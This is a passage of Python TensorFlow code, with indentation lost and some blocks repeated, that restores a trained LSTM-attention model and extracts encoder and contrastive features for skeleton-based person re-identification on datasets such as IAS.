f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
t_X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_y.extend([k] * (batch_size - flag))
# t_C_y.extend([k] * (batch_size - flag))
else:
t_y.extend([k] * (batch_size - flag) * time_steps)
if dataset == 'IAS':
for k, v in t_2_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_2_input_data[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
this_targets = t_2_targets[v[batch_i * batch_size: (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state,
alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state,
alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_2_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_2_X.append(att_op)
else:
att_batch.append(att_op)
else:
t_2_X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_2_X.append(f_o)
else:
t_2_X.extend(f_o.tolist())
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_2_X.extend(c_vec)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_2_y.extend([k] * (batch_size - flag))
# t_2_C_y.extend([k] * (batch_size - flag))
else:
t_2_y.extend([k] * (batch_size - flag) * time_steps)
X_0 = np.array(X)
y_0 = np.array(y)
X_pred_0 = np.array(X_pred)
t_X_pred_0 = np.array(t_X_pred)
from sklearn.preprocessing import label_binarize
ids_keys = sorted(list(ids.keys()))
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in ids_keys]
t_classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=t_classes)
if dataset == 'IAS':
t_2_ids_keys = sorted(list(t_2_ids.keys()))
t_2_classes = [i for i in t_2_ids_keys]
t_2_y = label_binarize(t_2_y, classes=t_2_classes)
t_2_y_0 = t_2_y
t_2_X_0 = t_2_X
t_y = np.array(t_y)
if C_reid == '1':
t_C_X = np.array(t_C_X)
else:
t_X = np.array(t_X)
t_y_0 = t_y
t_X_0 = t_X
else:
# checkpoint 0
_targets = np.load(
'Datasets/' + frames_ps + view_dir + dataset + '_train_npy_data/target_' + dimension + '_' + dataset + '_' + str(
time_steps) + '.npy')
_targets = _targets.reshape([-1, time_steps, series_length])
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint + '.meta')
loader.restore(sess, checkpoint)
input_data = loaded_graph.get_tensor_by_name('inputs:0')
targets = loaded_graph.get_tensor_by_name('targets:0')
if Frozen == '1':
contrast_v = loaded_graph.get_tensor_by_name('add_16:0')
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
C_input = loaded_graph.get_tensor_by_name('C_inptuiut:0')
else:
contrast_v = loaded_graph.get_tensor_by_name("add_2:0")
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
if Bi_LSTM:
encoder_output = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_6:0')
encoder_output_bw = loaded_graph.get_tensor_by_name('ReverseSequence: 0')
encoder_c_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_3:0')
encoder_h_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_4:0')
encoder_c_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_5:0')
encoder_h_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
else:
encoder_output = loaded_graph.get_tensor_by_name('rnn/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('rnn/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('rnn/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
# train_output = loaded_graph.get_tensor_by_name('train_output:0')
if use_attention:
alignment_history = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
# train_attention_matrix = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
attention_state = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_12:0')
attention_weights = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_8:0')
alignment = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_10:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')
source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')
target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')
X = []
C_X = []
X_all_op = []
X_final_op = []
X_final_c = []
X_final_h = []
X_final_c1 = []
X_final_h1 = []
X_final_ch = []
X_final_ch1 = []
y = []
C_y = []
X_pred = []
t_X = []
t_C_X = []
t_y = []
t_C_y = []
t_2_X = []
t_2_C_X = []
t_2_y = []
t_2_C_y = []
t_X_pred = []
t_X_att = []
# print(t_ids)
# print(test_attention)
ids_ = sorted(ids.items(), key=lambda item:item[0])
t_ids_ = sorted(t_ids.items(), key=lambda item: item[0])
if dataset == 'IAS':
t_2_ids_ = sorted(t_2_ids.items(), key=lambda item: item[0])
# print(ids_)
# exit(1)
for k, v in ids_:
if len(v) == 0:
print(k)
continue
if len(v) < batch_size:
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = _input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = _targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'c':
X.append(t2)
elif type == 'ch':
t3.extend(t2)
X.append(t3)
elif type == 'o':
X.append(t1)
elif type == 'oc':
t1.extend(t2)
X.append(t1)
elif type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
X.append(att_op)
else:
att_batch.append(att_op)
# else:
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# X.append(c_vec)
else:
X.extend(att_op.tolist())
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# # if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# att_batch.append(att_op)
# att_batch = np.array(att_batch)
# _, c_loss, c_vec = sess.run([C_train_op, C_loss, contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o + f_o_bw
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
X.append(f_o)
else:
X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'c':
# X_pred.append(t2)
# elif type == 'ch':
# t3.extend(t2)
# X_pred.append(t3)
# elif type == 'o':
# X_pred.append(t1)
# elif type == 'oc':
# t1.extend(t2)
# X_pred.append(t1)
# elif type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# X_pred.append(att_op)
# else:
# X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# # if Bi_LSTM:
# # f_o_bw = encoder_outputs_bw[index, :, :]
# # f_o = f_o + f_o_bw
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# X_pred.append(f_o)
# else:
# X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
y.extend([k] * batch_size)
# C_y.extend([k] * batch_size)
else:
y.extend([k] * batch_size * time_steps)
# exit(1)
for k, v in t_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X.append(att_op)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_X.append(c_vec)
else:
t_X.extend(att_op.tolist())
t_X_att.append(weights)
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_X.append(f_o)
else:
t_X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
t_X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X_pred.append(att_op)
# else:
# t_X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# t_X_pred.append(f_o)
# else:
# t_X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# t_X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_y.extend([k] * (batch_size - flag))
# t_C_y.extend([k] * (batch_size - flag))
else:
t_y.extend([k] * (batch_size - flag) * time_steps)
if dataset == 'IAS':
for k, v in t_2_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_2_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_2_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_2_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_2_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_2_X.append(c_vec)
else:
t_2_X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_2_X.append(f_o)
else:
t_2_X.extend(f_o.tolist())
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_2_X.extend(c_vec)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_2_y.extend([k] * (batch_size - flag))
# t_2_C_y.extend([k] * (batch_size - flag))
else:
t_2_y.extend([k] * (batch_size - flag) * time_steps)
X_0 = np.array(X)
y_0 = np.array(y)
X_pred_0 = np.array(X_pred)
t_X_pred_0 = np.array(t_X_pred)
from sklearn.preprocessing import label_binarize
ids_keys = sorted(list(ids.keys()))
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in ids_keys]
t_classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=t_classes)
if dataset == 'IAS':
t_2_ids_keys = sorted(list(t_2_ids.keys()))
t_2_classes = [i for i in t_2_ids_keys]
t_2_y = label_binarize(t_2_y, classes=t_2_classes)
t_2_y_0 = t_2_y
t_2_X_0 = t_2_X
t_y = np.array(t_y)
if C_reid == '1':
t_C_X = np.array(t_C_X)
else:
t_X = np.array(t_X)
t_y_0 = t_y
t_X_0 = t_X
# checkpoint 0
_targets = np.load(
'Datasets/' + frames_ps + view_dir + dataset + '_train_npy_data/target_' + dimension + '_' + dataset + '_' + str(
time_steps) + '.npy')
_targets = _targets.reshape([-1, time_steps, series_length])
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint + '.meta')
loader.restore(sess, checkpoint)
input_data = loaded_graph.get_tensor_by_name('inputs:0')
targets = loaded_graph.get_tensor_by_name('targets:0')
if Frozen == '1':
contrast_v = loaded_graph.get_tensor_by_name('add_16:0')
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
C_input = loaded_graph.get_tensor_by_name('C_inptuiut:0')
else:
contrast_v = loaded_graph.get_tensor_by_name("add_2:0")
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
if Bi_LSTM:
encoder_output = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_6:0')
encoder_output_bw = loaded_graph.get_tensor_by_name('ReverseSequence: 0')
encoder_c_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_3:0')
encoder_h_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_4:0')
encoder_c_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_5:0')
encoder_h_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
else:
encoder_output = loaded_graph.get_tensor_by_name('rnn/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('rnn/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('rnn/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
# train_output = loaded_graph.get_tensor_by_name('train_output:0')
if use_attention:
alignment_history = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
# train_attention_matrix = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
attention_state = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_12:0')
attention_weights = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_8:0')
alignment = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_10:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')
source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')
target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')
X = []
C_X = []
X_all_op = []
X_final_op = []
X_final_c = []
X_final_h = []
X_final_c1 = []
X_final_h1 = []
X_final_ch = []
X_final_ch1 = []
y = []
C_y = []
X_pred = []
t_X = []
t_C_X = []
t_y = []
t_C_y = []
t_2_X = []
t_2_C_X = []
t_2_y = []
t_2_C_y = []
t_X_pred = []
t_X_att = []
# print(t_ids)
# print(test_attention)
ids_ = sorted(ids.items(), key=lambda item:item[0])
t_ids_ = sorted(t_ids.items(), key=lambda item: item[0])
if dataset == 'IAS':
t_2_ids_ = sorted(t_2_ids.items(), key=lambda item: item[0])
# print(ids_)
# exit(1)
for k, v in ids_:
if len(v) == 0:
print(k)
continue
if len(v) < batch_size:
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = _input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = _targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
